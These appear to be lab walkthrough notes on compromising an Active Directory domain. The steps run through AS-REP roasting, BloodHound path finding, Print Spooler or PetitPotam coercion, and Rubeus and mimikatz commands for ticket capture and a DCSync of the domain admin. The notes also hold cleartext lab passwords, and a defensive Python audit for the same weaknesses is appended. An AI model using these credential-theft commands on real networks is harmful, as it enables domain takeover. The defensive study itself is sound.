lookupsid to retrieve the list of users
- lookupsid.py from the impacket suite

AS-REP roasting hclark
- GetNPUsers from the impacket suite

pypykatz, AYOUNG account
- Pypykatz

AYOUNG can change CMOORE's password
- Bloodhound.py as the collector
- Neo4j as the database
- Bloodhound as the mapping tool
- Powersploit to change the password

CMOORE is admin on sharepoint
- Crackmapexec to scan access

Unconstrained delegation on sharepoint
- Seen from Bloodhound

DCSync of the DC
- Via Rubeus.exe and Mimikatz.exe
- Force a Kerberos authentication via PetitPotam or Dementor.py

HCLARCK / spiderman
AYOUNG / iloverobbin
CMOORE /

.\Rubeus.exe monitor /interval:1 /nowrap

On Kali, run dementor to force an authentication from the KDC.

(If the Print Spooler service is enabled, you can use some already known AD credentials to request to the Domain Controller's print server an update on new print jobs and just tell it to send the notification to some system. Note that when the printer sends the notification to an arbitrary system, it needs to authenticate against that system. Therefore, an attacker can make the Print Spooler service authenticate against an arbitrary system, and the service will use the computer account in this authentication.
from: https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/printers-spooler-service-abuse
see also: https://www.thehacker.recipes/ad/movement/print-spooler-service/printerbug)

.\Rubeus.exe ptt /ticket:
klist
lsadump::dcsync /user:lab\administrateur /domain:lab.local -> obtain the NT hash of the domain admin
sekurlsa::tickets /export

https://beta.hackndo.com
https://github.com/SecureAuthCorp/impacket
https://github.com/PowerShellMafia/PowerSploit
https://github.com/BloodHoundAD/BloodHound
https://github.com/fox-it/BloodHound.py
https://book.hacktricks.xyz
https://www.thehacker.recipes
https://tryhackme.com/paths
https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
https://github.com/NotMedic/NetNTLMtoSilverTicket
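
The chain in these notes depends on three directory conditions: an account without Kerberos pre-authentication (hclark), a member server with unconstrained delegation (sharepoint), and a Domain Controller with the Print Spooler running. The audit below is an added example, not part of the original notes; the export format, the `spooler_running` inventory field, the sample values and the finding labels are assumptions made for illustration.

```python
# Documented userAccountControl bits.
SERVER_TRUST_ACCOUNT = 0x2000      # account is a Domain Controller
TRUSTED_FOR_DELEGATION = 0x80000   # unconstrained Kerberos delegation
DONT_REQ_PREAUTH = 0x400000        # Kerberos pre-authentication disabled

# Constructed sample export: (sAMAccountName, userAccountControl, spooler_running).
# spooler_running is a hypothetical inventory field; None means not a host.
SAMPLE_EXPORT = [
    ("DC01$", 0x82000, True),        # DC: the delegation bit is normal here
    ("SHAREPOINT$", 0x81000, True),  # member server trusted for delegation
    ("WKS01$", 0x1000, False),       # ordinary workstation
    ("hclark", 0x400200, None),      # normal user, pre-auth not required
    ("ayoung", 0x200, None),         # normal user
]


def audit(export):
    """Return (object, finding) pairs for the conditions the notes rely on."""
    findings = []
    for name, uac, spooler in export:
        is_dc = bool(uac & SERVER_TRUST_ACCOUNT)
        if uac & DONT_REQ_PREAUTH:
            # Fix: require pre-authentication on the account again.
            findings.append((name, "preauth-disabled"))
        if uac & TRUSTED_FOR_DELEGATION and not is_dc:
            # Fix: remove the flag or move to constrained delegation.
            findings.append((name, "unconstrained-delegation"))
        if is_dc and spooler:
            # Fix: stop and disable the Print Spooler service on the DC.
            findings.append((name, "spooler-on-dc"))
    # Both conditions together mean a DC ticket can end up cached on the
    # delegation host, so report each pair as its own finding.
    hosts = [n for n, f in findings if f == "unconstrained-delegation"]
    dcs = [n for n, f in findings if f == "spooler-on-dc"]
    findings += [(f"{dc}->{host}", "coercion-path") for dc in dcs for host in hosts]
    return findings


if __name__ == "__main__":
    for obj, finding in audit(SAMPLE_EXPORT):
        print(f"{finding:26} {obj}")
```
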